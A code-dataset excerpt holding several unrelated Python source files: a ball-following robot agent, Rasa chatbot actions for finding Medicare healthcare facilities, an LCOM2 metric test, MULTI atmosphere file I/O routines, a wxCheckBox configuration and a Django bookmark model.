id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
3420335 | import threading
import numpy as np
import cv2
from mobot.brain.agent import Agent
from mobot.utils.image_grid import ImageGrid
from mobot.utils.rate import Rate
class BallFollower(Agent):
    """Agent that visually tracks a yellow ball and drives the chassis to
    keep the ball centered laterally and at a fixed apparent radius
    (i.e. at a roughly constant distance)."""

    def __init__(self):
        Agent.__init__(self)
        self.camera.register_callback(self.camera_cb)
        self.chassis.enable()
        # Keep the Thread object and the target method under different names;
        # the original code rebound ``self.control_thread`` from the method to
        # the Thread object, making the method unreachable afterwards.
        self.control_thread = threading.Thread(target=self._control_loop)
        self.image_grid = ImageGrid(self, size=(1, 3))
        self.ball = None    # latest detection as (x, y, r) in pixels, or None
        self.width = None   # camera image width in pixels, set by camera_cb

    def on_start(self):
        """Start the 20 Hz control loop once the agent is running."""
        self.control_thread.start()

    def _control_loop(self):
        """Steer toward the ball and regulate distance at 20 Hz."""
        rate = Rate(20)
        while self.ok():
            # Also require self.width: guards against the control thread
            # running before the first camera callback has set it.
            if self.ball is not None and self.width is not None:
                center = self.width // 2
                x, y, r = self.ball
                target_r = 50  # desired apparent radius (px) ~ distance setpoint
                lateral_error = center - x
                longitudinal_error = target_r - r
                self.logger.info(f"lateral_error: {lateral_error}, longitudinal_error: {longitudinal_error}")
                w = self.lateral_policy(lateral_error)
                v = self.longitudinal_policy(longitudinal_error)
                self.chassis.set_cmdvel(v=v, w=w)
            else:
                # No ball visible: stop the chassis.
                self.chassis.set_cmdvel(v=0.0, w=0.0)
            rate.sleep()

    def lateral_policy(self, lateral_error):
        """Bang-bang steering: turn at +/-0.5 rad/s when the ball is more
        than 100 px off-center, otherwise do not turn."""
        if lateral_error > 100:
            w = 0.5
        elif lateral_error < -100:
            w = -0.5
        else:
            w = 0
        return w

    def longitudinal_policy(self, longitudinal_error):
        """Bang-bang driving: move at +/-0.06 m/s when the apparent radius is
        more than 20 px away from the target, otherwise stand still."""
        if longitudinal_error > 20:
            v = 0.06
        elif longitudinal_error < -20:
            v = -0.06
        else:
            v = 0
        return v

    def camera_cb(self, image, metadata):
        """Camera callback: run ball segmentation and update the image grid.

        Set ``self.width`` before ``self.ball`` so the control loop never
        sees a ball without a valid image width.
        """
        self.width = metadata.width
        self.image_grid.new_image(image, index=(0, 0))
        # np.flip on the last axis swaps BGR<->RGB channel order.
        marked_image, seg_image, self.ball = self.segment_ball(np.flip(image, axis=-1))
        self.image_grid.new_image(np.flip(seg_image, axis=-1), index=(0, 1))
        self.image_grid.new_image(np.flip(marked_image, axis=-1), index=(0, 2))

    def segment_ball(self, image):
        """Detect a yellow ball via HSV masking plus Hough circles.

        Returns (marked_image, seg_image, ball) where ball is an (x, y, r)
        array or None when no circle was found.
        """
        marked_image = image.copy()
        lower_yellow = np.array([14, 82, 160])
        upper_yellow = np.array([56, 255, 255])
        hsv_image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
        mask = cv2.inRange(hsv_image, lower_yellow, upper_yellow)
        # Erode/dilate to remove speckle noise from the color mask.
        mask = cv2.erode(mask, None, iterations=2)
        mask = cv2.dilate(mask, None, iterations=2)
        seg_image = cv2.bitwise_and(image, image, mask=mask)
        gray_image = cv2.cvtColor(seg_image, cv2.COLOR_BGR2GRAY)
        circles = cv2.HoughCircles(gray_image, cv2.HOUGH_GRADIENT,
                                   3, 1000,
                                   minRadius=20,
                                   maxRadius=150,
                                   param1=50,
                                   param2=30)
        ball = None
        if circles is not None:
            circles = np.round(circles.squeeze()).astype("int")
            # HoughCircles may return several candidates (shape (N, 3) after
            # squeeze); keep the first so the (x, y, r) unpack cannot fail.
            if circles.ndim > 1:
                circles = circles[0]
            ball = circles
            x, y, r = ball
            cv2.circle(marked_image, (x, y), r, (0, 255, 0), 4)
        return marked_image, seg_image, ball
if __name__ == "__main__":
    # Instantiate the agent and hand control to the framework's main loop.
    ball_follower = BallFollower()
    ball_follower.start()
| StarcoderdataPython |
3490597 | <reponame>sahilkumar15/ChatBots<gh_stars>100-1000
from rasa_sdk import Tracker
from rasa_sdk.executor import CollectingDispatcher
from typing import Dict, Text, Any, List
import requests
from rasa_sdk import Action
from rasa_sdk.events import SlotSet, FollowupAction
from rasa_sdk.forms import FormAction
# We use the medicare.gov database to find information about 3 different
# healthcare facility types, given a city name, zip code or facility ID
# the identifiers for each facility type is given by the medicare database
# xubh-q36u is for hospitals
# b27b-2uc7 is for nursing homes
# 9wzi-peqs is for home health agencies
# Maps each medicare.gov resource id to its query templates; "base" is the
# shared URL template into which the resource id is substituted.
ENDPOINTS = {
    "base": "https://data.medicare.gov/resource/{}.json",
    "xubh-q36u": {  # hospitals
        "city_query": "?city={}",
        "zip_code_query": "?zip_code={}",
        "id_query": "?provider_id={}"
    },
    "b27b-2uc7": {  # nursing homes
        "city_query": "?provider_city={}",
        "zip_code_query": "?provider_zip_code={}",
        "id_query": "?federal_provider_number={}"
    },
    "9wzi-peqs": {  # home health agencies
        "city_query": "?city={}",
        "zip_code_query": "?zip={}",
        "id_query": "?provider_number={}"
    }
}
# Display name and medicare.gov resource id for each supported facility type.
FACILITY_TYPES = {
    "hospital":
        {
            "name": "hospital",
            "resource": "xubh-q36u"
        },
    "nursing_home":
        {
            "name": "nursing home",
            "resource": "b27b-2uc7"
        },
    "home_health":
        {
            "name": "home health agency",
            "resource": "9wzi-peqs"
        }
}
def _create_path(base: Text, resource: Text,
query: Text, values: Text) -> Text:
"""Creates a path to find provider using the endpoints."""
if isinstance(values, list):
return (base + query).format(
resource, ', '.join('"{0}"'.format(w) for w in values))
else:
return (base + query).format(resource, values)
def _find_facilities(location: Text, resource: Text) -> List[Dict]:
    """Query the medicare.gov API for facilities matching the location.

    A purely numeric location is treated as a zip code, anything else as a
    city name (uppercased, as stored by the API).
    """
    if str.isdigit(location):
        query_template = ENDPOINTS[resource]["zip_code_query"]
        query_value = location
    else:
        query_template = ENDPOINTS[resource]["city_query"]
        query_value = location.upper()
    full_path = _create_path(ENDPOINTS["base"], resource,
                             query_template, query_value)
    return requests.get(full_path).json()
def _resolve_name(facility_types, resource) ->Text:
for key, value in facility_types.items():
if value.get("resource") == resource:
return value.get("name")
return ""
class FindFacilityTypes(Action):
    """This action class allows to display buttons for each facility type
    for the user to chose from to fill the facility_type entity slot."""

    def name(self) -> Text:
        """Unique identifier of the action"""
        return "find_facility_types"

    def run(self,
            dispatcher: CollectingDispatcher,
            tracker: Tracker,
            domain: Dict[Text, Any]) -> List:
        """Show one button per known facility type; clicking a button sends
        an /inform intent carrying the facility's resource id."""
        buttons = []
        for t in FACILITY_TYPES:
            facility_type = FACILITY_TYPES[t]
            # The payload encodes the entity value the button click will set.
            payload = "/inform{\"facility_type\": \"" + facility_type.get(
                "resource") + "\"}"
            buttons.append(
                {"title": "{}".format(facility_type.get("name").title()),
                 "payload": payload})
        # TODO: update rasa core version for configurable `button_type`
        dispatcher.utter_button_template("utter_greet", buttons, tracker)
        return []
class FindHealthCareAddress(Action):
    """This action class retrieves the address of the user's
    healthcare facility choice to display it to the user."""

    def name(self) -> Text:
        """Unique identifier of the action"""
        return "find_healthcare_address"

    def run(self,
            dispatcher: CollectingDispatcher,
            tracker: Tracker,
            domain: Dict[Text, Any]) -> List[Dict]:
        """Look up the chosen facility by id and store its formatted address
        in the facility_address slot ("not found" when the lookup fails)."""
        facility_type = tracker.get_slot("facility_type")
        healthcare_id = tracker.get_slot("facility_id")
        full_path = _create_path(ENDPOINTS["base"], facility_type,
                                 ENDPOINTS[facility_type]["id_query"],
                                 healthcare_id)
        results = requests.get(full_path).json()
        if results:
            selected = results[0]
            # Each medicare dataset exposes the address under different keys.
            if facility_type == FACILITY_TYPES["hospital"]["resource"]:
                address = "{}, {}, {} {}".format(selected["address"].title(),
                                                 selected["city"].title(),
                                                 selected["state"].upper(),
                                                 selected["zip_code"].title())
            elif facility_type == FACILITY_TYPES["nursing_home"]["resource"]:
                address = "{}, {}, {} {}".format(selected["provider_address"].title(),
                                                 selected["provider_city"].title(),
                                                 selected["provider_state"].upper(),
                                                 selected["provider_zip_code"].title())
            else:
                address = "{}, {}, {} {}".format(selected["address"].title(),
                                                 selected["city"].title(),
                                                 selected["state"].upper(),
                                                 selected["zip"].title())
            return [SlotSet("facility_address", address)]
        else:
            print("No address found. Most likely this action was executed "
                  "before the user choose a healthcare facility from the "
                  "provided list. "
                  "If this is a common problem in your dialogue flow,"
                  "using a form instead for this action might be appropriate.")
            return [SlotSet("facility_address", "not found")]
class FacilityForm(FormAction):
    """Custom form action to fill all slots required to find specific type
    of healthcare facilities in a certain city or zip code."""

    def name(self) -> Text:
        """Unique identifier of the form"""
        return "facility_form"

    @staticmethod
    def required_slots(tracker: Tracker) -> List[Text]:
        """A list of required slots that the form has to fill"""
        return ["facility_type", "location"]

    def slot_mappings(self) -> Dict[Text, Any]:
        # Both slots may be filled from either the inform or the
        # search_provider intent.
        return {"facility_type": self.from_entity(entity="facility_type",
                                                  intent=["inform",
                                                          "search_provider"]),
                "location": self.from_entity(entity="location",
                                             intent=["inform",
                                                     "search_provider"])}

    def submit(self,
               dispatcher: CollectingDispatcher,
               tracker: Tracker,
               domain: Dict[Text, Any]
               ) -> List[Dict]:
        """Once required slots are filled, print buttons for found facilities"""
        location = tracker.get_slot('location')
        facility_type = tracker.get_slot('facility_type')
        results = _find_facilities(location, facility_type)
        button_name = _resolve_name(FACILITY_TYPES, facility_type)
        if len(results) == 0:
            dispatcher.utter_message(
                "Sorry, we could not find a {} in {}.".format(button_name,
                                                              location.title()))
            return []
        buttons = []
        # limit number of results to 3 for clear presentation purposes
        for r in results[:3]:
            # Each dataset stores its facility id under a different key.
            if facility_type == FACILITY_TYPES["hospital"]["resource"]:
                # NOTE(review): .get() may return None here, which would break
                # the string concatenation building `payload` below; the other
                # branches index directly. Confirm provider_id is always set.
                facility_id = r.get("provider_id")
                name = r["hospital_name"]
            elif facility_type == FACILITY_TYPES["nursing_home"]["resource"]:
                facility_id = r["federal_provider_number"]
                name = r["provider_name"]
            else:
                facility_id = r["provider_number"]
                name = r["provider_name"]
            payload = "/inform{\"facility_id\":\"" + facility_id + "\"}"
            buttons.append(
                {"title": "{}".format(name.title()), "payload": payload})
        if len(buttons) == 1:
            message = "Here is a {} near you:".format(button_name)
        else:
            # Drop the trailing "y" so the generic "+s" suffix below yields
            # the correct plural "agencies".
            if button_name == "home health agency":
                button_name = "home health agencie"
            message = "Here are {} {}s near you:".format(len(buttons),
                                                         button_name)
        # TODO: update rasa core version for configurable `button_type`
        dispatcher.utter_button_message(message, buttons)
        return []
| StarcoderdataPython |
4859166 | from typing import Dict, Union, Set
from unittest import TestCase
from networkx import DiGraph
from veniq.baselines.semi._common_types import Statement, StatementSemantic
from veniq.baselines.semi._lcom2 import LCOM2
from veniq.ast_framework import ASTNode
class LCOM2TestCase(TestCase):
    """Sanity checks for the LCOM2 cohesion metric."""

    def test_same_semantic(self):
        # Four statements all using the same object: perfectly cohesive.
        semantic = self._create_statements_semantic("x", "x", "x", "x")
        self.assertEqual(LCOM2(semantic), 0)

    def test_different_semantic(self):
        # Four statements with pairwise-disjoint objects: all 6 pairs differ.
        semantic = self._create_statements_semantic("x", "y", "z", "a")
        self.assertEqual(LCOM2(semantic), 6)

    def test_equal_pairs_quantity(self):
        # Every statement shares "x", so cohesive pairs balance the rest out.
        semantic = self._create_statements_semantic(
            "x", {"x", "y"}, {"x", "z"}, {"x", "a"})
        self.assertEqual(LCOM2(semantic), 0)

    @staticmethod
    def _create_statements_semantic(
        *used_object_name: Union[str, Set[str]]
    ) -> Dict[Statement, StatementSemantic]:
        """Build one AST node per argument, wrapping bare names in a set."""
        graph = DiGraph()
        semantics = {}
        for node_id, objects in enumerate(used_object_name):
            used = objects if isinstance(objects, set) else {objects}
            semantics[ASTNode(graph, node_id)] = StatementSemantic(
                used_objects=used)
        return semantics
| StarcoderdataPython |
5019166 | <reponame>pylangstudy/201706
# Prompt repeatedly until the user enters a valid integer; Ctrl-C is caught
# and reported instead of aborting the prompt loop.
got_number = False
while not got_number:
    try:
        x = int(input("Please enter a number: "))
        got_number = True
    except KeyboardInterrupt:
        print("KeyboardInterrupt!!")
    except ValueError:
        print("Oops! That was no valid number. Try again")
| StarcoderdataPython |
4926483 | <reponame>M1kol4j/helita
"""
Set of routines to interface with MULTI (1D or _3D)
"""
import numpy as np
import os
class Multi_3dOut:
    """Reads and holds output from multi_3d (out3d plus optional cubes)."""

    def __init__(self, outfile=None, basedir='.', atmosid='', length=4,
                 verbose=False, readall=False):
        """ Class that reads and deals with output from multi_3d """
        self.verbose = verbose
        out3dfiles = ['cmass3d', 'dscal2', 'height3d', 'Iv3d', 'taulg3d',
                      'x3d', 'xnorm3d']
        c3dfiles = ['n3d', 'b3d']
        if outfile is None:
            outfile = '%s/out3d.%s' % (basedir, atmosid)
        else:
            basedir = os.path.split(outfile)[0]
            # BUGFIX: this previously used the undefined name `mm`, raising
            # NameError whenever an explicit outfile was supplied.
            atmosid = os.path.split(outfile)[1].split('out3d.')[1]
        out3dfiles = ['%s/%s.%s' % (basedir, s, atmosid) for s in out3dfiles]
        c3dfiles = ['%s/%s.%s' % (basedir, s, atmosid) for s in c3dfiles]
        self.read_out3d(outfile, length=length)
        # read all output files
        if readall:
            for f in out3dfiles:
                if os.path.isfile(f):
                    self.read_out3d(f, length=length)
            for f in c3dfiles:
                if os.path.isfile(f):
                    self.read_c3d(f, length=length,
                                  mode=(os.path.split(f)[1].split('.' +
                                                                  atmosid)[0]))
        return

    def check_basic(self):
        """
        Checks to see if basic input parameters have been read from out3d.
        """
        basic = ['nx', 'ny', 'ndep', 'mq', 'nrad', 'nqtot']
        for p in basic:
            if p not in dir(self):
                raise ValueError('(EEE) %s has not been read. Make sure '
                                 'out3d was read.' % p)
        return

    def read_out3d(self, outfile, length=4):
        """ Reads out3d file. """
        from ..io.fio import fort_read
        # find out endianness: the first record marker is 16 when read
        # little-endian; anything else means the file is big-endian.
        test = np.fromfile(outfile, dtype='<i', count=1)[0]
        be = False if test == 16 else True
        file = open(outfile, 'r')
        readon = True
        arrays_xyz = ['taulg3d', 'cmass3d', 'dscal2', 'xnorm3d', 'x3d',
                      'height3d']
        while readon:
            try:
                # Each record starts with a type code, size and 8-char label.
                itype, isize, cname = fort_read(file, 0, ['i', 'i', '8c'],
                                                big_endian=be, length=length)
                cname = cname.strip()
                if self.verbose:
                    print(('--- reading ' + cname))
                if cname == 'id':
                    self.id = fort_read(file, 0, ['80c'])[0].strip()
                elif cname == 'dim':
                    aa = fort_read(file, isize, 'i', big_endian=be,
                                   length=length)
                    self.nx, self.ny, self.ndep, self.mq, self.nrad = aa[:5]
                    if isize == 5:
                        self.version = 1
                    else:
                        self.version = 2
                        self.nq = aa[5:]
                        self.nqtot = np.sum(self.nq) + self.nrad
                    self.nxyz = self.nx * self.ny * self.ndep
                elif cname == 'q':
                    self.check_basic()
                    aa = fort_read(file, self.mq * self.nrad, 'f',
                                   big_endian=be, length=length)
                    self.q = np.transpose(aa.reshape(self.nrad, self.mq))
                elif cname == 'xl':
                    self.check_basic()
                    self.xl = fort_read(file, self.nqtot, 'd', big_endian=be,
                                        length=length)
                elif cname in arrays_xyz:
                    self.check_basic()
                    aa = fort_read(file, self.nxyz, 'f', big_endian=be,
                                   length=length)
                    setattr(self, cname,
                            np.transpose(aa.reshape(self.ndep, self.ny,
                                                    self.nx)))
                elif cname == 'Iv':
                    self.check_basic()
                    aa = fort_read(file, isize, 'f', big_endian=be,
                                   length=length)
                    self.Iv = np.transpose(aa.reshape(self.ny, self.nx,
                                                      self.nqtot))
                elif cname == 'n3d':  # might be broken...
                    self.check_basic()
                    self.nk = isize // (self.nx * self.ny * self.ndep)
                    aa = fort_read(file, isize, 'f', big_endian=be,
                                   length=length)
                    self.n3d = np.transpose(aa.reshape(self.nk, self.ndep,
                                                       self.ny, self.nx))
                elif cname == 'nk':
                    self.nk = fort_read(file, 1, 'i', big_endian=be,
                                        length=length)[0]
                else:
                    print(('(WWW) read_out3d: unknown label found: %s. '
                           'Aborting.' % cname))
                    break
            except EOFError:
                readon = False
        if self.verbose:
            print(('--- Read %s.' % outfile))
        return

    def read_c3d(self, outfile, length=4, mode='n3d'):
        ''' Reads the 3D cube output file, like n3d or b3d. '''
        self.check_basic()
        # Infer the number of levels from the file size (4 bytes per float).
        self.nk = os.path.getsize(outfile) // (self.nxyz * 4)
        setattr(self, mode, np.memmap(outfile, dtype='Float32', mode='r',
                                      order='F', shape=(self.nx, self.ny,
                                                        self.ndep, self.nk)))
        if self.verbose:
            print('--- Read ' + outfile)
        return
class Atmos3d:
    # Reader for the multi_3d / old multi3d "atmos3d" binary atmosphere file.

    def __init__(self, infile, big_endian=False):
        ''' Reads multi_3d/old multi3d atmos3d file '''
        self.big_endian = big_endian
        self.read(infile, big_endian=big_endian)
        return

    def read(self, infile, big_endian, length=4):
        """Read the atmos3d file: dimensions, axes, then the 3D arrays
        (ne, temp, vx, vy, vz and, when present at the end, rho). Arrays
        are stored in Fortran order and transposed to (nx, ny, nz)."""
        from ..io.fio import fort_read
        file = open(infile, 'r')
        types = {4: 'f', 5: 'd'}  # precision, float or double
        # read header stuff
        fort_read(file, 16, 'b', big_endian=big_endian, length=length)
        nx, ny, nz = fort_read(file, 3, 'i', big_endian=big_endian,
                               length=length)
        self.nx = nx
        self.ny = ny
        self.nz = nz
        # x [cm]
        # The first record header's itype code fixes float vs double
        # for every array that follows.
        itype, isize, lx1, lx2 = fort_read(file, 4, 'i', big_endian=big_endian,
                                           length=length)
        prec = types[itype]
        self.x = fort_read(file, nx, prec, big_endian=big_endian,
                           length=length)
        # y [cm] (16-byte reads below just skip each record header)
        fort_read(file, 16, 'b', big_endian=big_endian, length=length)
        self.y = fort_read(file, ny, prec, big_endian=big_endian,
                           length=length)
        # z [cm]
        fort_read(file, 16, 'b', big_endian=big_endian, length=length)
        self.z = fort_read(file, nz, prec, big_endian=big_endian,
                           length=length)
        # electron density [cm-3]
        fort_read(file, 16, 'b', big_endian=big_endian, length=length)
        aa = fort_read(file, nx * ny * nz, prec, big_endian=big_endian,
                       length=length)
        self.ne = np.transpose(aa.reshape((nz, ny, nx)))
        # temperature [K]
        fort_read(file, 16, 'b', big_endian=big_endian, length=length)
        aa = fort_read(file, nx * ny * nz, prec, big_endian=big_endian,
                       length=length)
        self.temp = np.transpose(aa.reshape((nz, ny, nx)))
        # vx [km/s]
        fort_read(file, 16, 'b', big_endian=big_endian, length=length)
        aa = fort_read(file, nx * ny * nz, prec, big_endian=big_endian,
                       length=length)
        self.vx = np.transpose(aa.reshape((nz, ny, nx)))
        # vy [km/s]
        fort_read(file, 16, 'b', big_endian=big_endian, length=length)
        aa = fort_read(file, nx * ny * nz, prec, big_endian=big_endian,
                       length=length)
        self.vy = np.transpose(aa.reshape((nz, ny, nx)))
        # vz [km/s]
        fort_read(file, 16, 'b', big_endian=big_endian, length=length)
        aa = fort_read(file, nx * ny * nz, prec, big_endian=big_endian,
                       length=length)
        self.vz = np.transpose(aa.reshape((nz, ny, nx)))
        # reading rho, if written to file
        last = fort_read(file, 16, 'b', big_endian=big_endian, length=length)
        if len(last) != 0:
            # rho [g cm-3]
            aa = fort_read(file, nx * ny * nz, prec, big_endian=big_endian,
                           length=length)
            self.rho = np.transpose(aa.reshape((nz, ny, nx)))
        file.close()
        return

    def write_rh15d(self, outfile, sx=None, sy=None, sz=None, desc=None):
        ''' Writes atmos into rh15d NetCDF format. '''
        from . import rh15d
        if not hasattr(self, 'rho'):
            raise UnboundLocalError('(EEE) write_rh15d: present atmosphere has'
                                    'no rho, cannot convert to rh15d format')
        # slicing and unit conversion
        # sx/sy/sz are [start, stop, step] slices; default to the full cube.
        if sx is None:
            sx = [0, self.nx, 1]
        if sy is None:
            sy = [0, self.ny, 1]
        if sz is None:
            sz = [0, self.nz, 1]
        temp = self.temp[sx[0]:sx[1]:sx[2], sy[0]:sy[1]:sy[2],
                         sz[0]:sz[1]:sz[2]]
        rho = self.rho[sx[0]:sx[1]:sx[2], sy[0]:sy[1]:sy[2], sz[0]:sz[1]:sz[2]]
        # cm^-3 -> m^-3
        ne = self.ne[sx[0]:sx[1]:sx[2], sy[0]:sy[1]:sy[2],
                     sz[0]:sz[1]:sz[2]] * 1.e6
        # km/s -> m/s
        vz = self.vz[sx[0]:sx[1]:sx[2], sy[0]:sy[1]:sy[2],
                     sz[0]:sz[1]:sz[2]] * 1.e3
        # cm -> m
        z = self.z[sz[0]:sz[1]:sz[2]] * 1e-2
        nh = rho / 2.380491e-24 * 1.e6  # from rho to nH in m^-3
        # write to file
        rh15d.make_ncdf_atmos(outfile, temp, vz, ne, nh, z, append=False,
                              desc=desc, snap=0)
        return
def watmos_multi(filename, temp, ne, z=None, logtau=None, vz=None, vturb=None,
                 cmass=None, nh=None, id='Model', scale='height', logg=4.44,
                 write_dscale=False, spherical=False, radius=6.96e5):
    """
    Writes atmosphere in MULTI format, on a HEIGHT, TAU(5000) or MASS scale.
    Writes the companion .dscale file only when write_dscale is True.
    The following units must be used:
    * Temp [K]
    * ne [cm^-3]
    * nh [cm^-3]
    * vz [km/s]
    * vturb [km/s] (array, or a scalar applied at every depth)
    * z [km]
    * cmass [gm cm^-2] (optional)
    --Tiago, 20101118
    """
    if scale.lower() == 'height':
        if z is None:
            raise ValueError('watmos_multi: height scale selected '
                             'but z not given!')
        scl = z
        desc = 'HEIGHT (KM)'
    elif scale.lower() == 'tau':
        # Compare against None instead of truthiness: `not logtau` raised
        # ValueError for numpy arrays and wrongly rejected all-zero scales.
        if logtau is None:
            raise ValueError('watmos_multi: tau scale selected but '
                             'tau not given!')
        scl = logtau
        desc = 'LG TAU(5000)'
    elif scale.lower() == 'mass':
        if cmass is None:
            raise ValueError('watmos_multi: mass scale selected but '
                             'column mass not given!')
        scl = cmass
        desc = 'LOG COLUMN MASS'
    else:
        # Previously an unknown scale fell through and caused a NameError
        # on `scl` further down; fail fast with a clear message instead.
        raise ValueError('watmos_multi: unknown scale %s' % scale)
    f = open(filename, 'w')
    ndep = len(temp)
    # write 'header'
    f.write(' {0}\n*\n'.format(id))
    f.write(' {0} scale\n'.format(scale).upper())
    f.write('* LG G\n')
    f.write('{0:6.2f}\n'.format(logg))
    if spherical:
        f.write('* Nradius Ncore Ninter\n')
        f.write('{0:5d} 8 0\n'.format(ndep))
    else:
        f.write('* NDEP\n')
        f.write('{0:5d}\n'.format(ndep))
    f.write('* {0} TEMPERATURE NE V '
            'VTURB\n'.format(desc))
    if vz is None:
        vz = np.zeros(ndep, dtype='f')
    if vturb is None:
        vturb = np.zeros(ndep, dtype='f')
    elif np.isscalar(vturb):
        # Broadcast a constant microturbulence to every depth point. The old
        # `type(vturb) == type(5)` check silently missed floats, which then
        # crashed on `vturb[i]` in the loop below.
        vturb = np.zeros(ndep, dtype='f') + vturb
    # write atmosphere
    for i in range(ndep):
        # astype hack to get over numpy bug
        f.write('{0:15.6E}{1:15.6E}{2:15.6E}{3:15.6E}{4:15.6E}'
                '\n'.format(scl[i].astype('d'), temp[i].astype('d'),
                            ne[i].astype('d'), vz[i].astype('d'),
                            vturb[i].astype('d')))
    # if nh given
    if nh is not None:
        if nh.shape != (6, ndep):
            raise ValueError('watmos_multi: nh has incorrect shape. Must be '
                             '6 H levels!')
        f.write('*\n* Hydrogen populations\n')
        f.write('* nh(1) nh(2) nh(3) nh(4) nh(5) '
                'np\n')
        for i in range(ndep):
            ss = ''
            for j in range(nh.shape[0]):
                ss += '{0:12.4E}'.format(nh[j, i].astype('d'))
            f.write(ss + '\n')
    f.close()
    print('--- Wrote multi atmosphere to ' + filename)
    if write_dscale:
        f = open(filename + '.dscale', 'w')
        f.write(' {0}\n*\n'.format(id))
        f.write(' {0} scale\n'.format(scale).upper())
        # setting the second element to zero will force it to be calculated
        # in DPCONV. Will it work for height scale?
        f.write('{0:5d} {1:.5f}\n'.format(ndep, 0.))
        for i in range(ndep):
            f.write('{0:15.6E}\n'.format(scl[i].astype('d')))
        f.close()
        print(('--- Wrote dscale to ' + filename + '.dscale'))
    return
def write_atmos3d(outfile, x, y, z, ne, temp, vz, vx=None, vy=None, rho=None,
                  big_endian=False, length=4, prec='Float32'):
    """
    Writes atmos3d atmosphere (format of 'old' multi3d and multi_3d).
    vx and vy are optional, if not specified zeros will be used. rho is
    also optional, if not specified it will not be written at the end of the
    file.
    Input 3D arrays (ne, temp, vx, vy, vz, rho) must be in C order!
    (shape = [nx, ny, nz]) They will be written in Fortran order
    (shape=[nz,ny,nx])
    IN:
    x, y, z [cm]: 1D arrays
    ne [cm-3]: 3D array
    temp [K]: 3D array
    vz [km/s]: 3D array
    vx, vy [km/s]: 3D arrays, optional
    rho [g cm-3]: 3D array, optional
    big_endian: Boolean, if true will write in big endian
    length: length of fortran format pad. Should be 4 in most cases.
    prec: precision (Float32 or Float64)
    """
    import os
    from ..io.fio import fort_write
    # Refuse to overwrite existing output.
    if os.path.isfile(outfile):
        raise IOError('(EEE) write_atmos3d: file %s already exists, refusing '
                      'to overwrite.' % outfile)
    f = open(outfile, 'w')
    # Tiago note: these should be fortran longs. However, in 64-bit systems the
    #             size of a long in python is 8 bytes, where fortran longs are
    #             still 4 bytes. Hence, it is better to keep all longs as ints,
    #             as sizeof(int) = 4
    nx = len(x)
    ny = len(y)
    nz = len(z)
    ii = 3                                       # record type code: integer
    ir = 5 if prec in ['Float64', 'd'] else 4    # record type code: double/float
    ll = length
    be = big_endian
    if vx is None:
        vx = np.zeros(vz.shape, dtype=prec)
    if vy is None:
        vy = np.zeros(vz.shape, dtype=prec)
    # NOTE(review): the size field of every record header below is written as
    # `nx`, even for the y/z grids and the 3D cubes. The reader in this module
    # (Atmos3d.read) skips these headers, but confirm before relying on the
    # size field from another consumer.
    fort_write(f, 0, [ii, 3, 'dim     '], big_endian=be, length=ll)
    fort_write(f, 0, [nx, ny, nz], big_endian=be, length=ll)
    fort_write(f, 0, [ir, nx, 'x grid  '], big_endian=be, length=ll)
    fort_write(f, x.size, x.astype(prec), big_endian=be, length=ll)
    fort_write(f, 0, [ir, nx, 'y grid  '], big_endian=be, length=ll)
    fort_write(f, y.size, y.astype(prec), big_endian=be, length=ll)
    fort_write(f, 0, [ir, nx, 'z grid  '], big_endian=be, length=ll)
    fort_write(f, z.size, z.astype(prec), big_endian=be, length=ll)
    fort_write(f, 0, [ir, nx, 'nne     '], big_endian=be, length=ll)
    fort_write(f, ne.size, np.transpose(ne).astype(prec), big_endian=be,
               length=ll)
    fort_write(f, 0, [ir, nx, 'temp    '], big_endian=be, length=ll)
    fort_write(f, temp.size, np.transpose(temp).astype(prec), big_endian=be,
               length=ll)
    fort_write(f, 0, [ir, nx, 'vel x   '], big_endian=be, length=ll)
    fort_write(f, vx.size, np.transpose(vx).astype(prec), big_endian=be,
               length=ll)
    fort_write(f, 0, [ir, nx, 'vel y   '], big_endian=be, length=ll)
    fort_write(f, vy.size, np.transpose(vy).astype(prec), big_endian=be,
               length=ll)
    fort_write(f, 0, [ir, nx, 'vel z   '], big_endian=be, length=ll)
    fort_write(f, vz.size, np.transpose(vz).astype(prec), big_endian=be,
               length=ll)
    if rho is not None:
        fort_write(f, 0, [ir, nx, 'rho     '], big_endian=be, length=ll)
        fort_write(f, rho.size, np.transpose(rho).astype(prec), big_endian=be,
                   length=ll)
    f.close()
    print(('Wrote %s' % outfile))
    return
| StarcoderdataPython |
6551119 | """\
wxCheckBox widget configuration
@copyright: 2014-2016 <NAME>
@license: MIT (see LICENSE.txt) - THIS PROGRAM COMES WITH NO WARRANTY
"""
# Declarative configuration for the wxCheckBox widget: wx class name,
# supported style flags (with their mutual exclusions/requirements),
# the value -> checkbox-state mapping, and the supported events.
config = {
    'wxklass': 'wxCheckBox',
    'style_defs': {
        'wxCHK_2STATE': {
            'desc': _('Create a 2-state checkbox. This is the default.'),
            'exclude': 'wxCHK_3STATE',
        },
        'wxCHK_3STATE': {
            'desc': _('Create a 3-state checkbox. Not implemented in wxOS2 '
                      'and wxGTK built against GTK+ 1.2.'),
            'exclude': 'wxCHK_2STATE',
        },
        'wxCHK_ALLOW_3RD_STATE_FOR_USER': {
            'desc': _("By default a user can't set a 3-state checkbox to the "
                      "third state. It can only be done from code. Using "
                      "this flags allows the user to set the checkbox to "
                      "the third state by clicking."),
            # Only meaningful together with the 3-state style.
            'require': 'wxCHK_3STATE',
        },
        'wxALIGN_RIGHT': {
            'desc': _('Makes the text appear on the left of the checkbox.')
        }
    },
    'style_list': ['wxCHK_2STATE', 'wxCHK_3STATE',
                   'wxCHK_ALLOW_3RD_STATE_FOR_USER', 'wxALIGN_RIGHT'],
    # mapping for selected values to checkbox states (wxCheckBoxState)
    'number2state': {
        0: 'wxCHK_UNCHECKED',
        1: 'wxCHK_CHECKED',
        2: 'wxCHK_UNDETERMINED',
    },
    'events': {
        'EVT_CHECKBOX': {},
    },
}
| StarcoderdataPython |
9754497 | from django.db import models
# local imports
from authors.apps.authentication.models import User
from authors.apps.articles.models import Article
class BookmarkArticle(models.Model):
    """
    Create the bookmark model
    """
    # Owner of the bookmark; deleting the user removes their bookmarks.
    user = models.ForeignKey(User, verbose_name='User', on_delete=models.CASCADE)
    # Bookmarked article; deleting the article removes its bookmarks.
    article = models.ForeignKey(Article, related_name='bookmark_url', verbose_name='Article', on_delete=models.CASCADE)
    created_at = models.DateTimeField(auto_now_add=True)
    objects = models.Manager()

    class Meta:
        # A user may bookmark a given article only once; newest first.
        unique_together = (('user', 'article'),)
        ordering = ['-created_at']

    def __str__(self):
        """
        Nice string of user and bookmarked article
        """
        return "{} bookmarked by user {}".format(self.article, self.user)
| StarcoderdataPython |
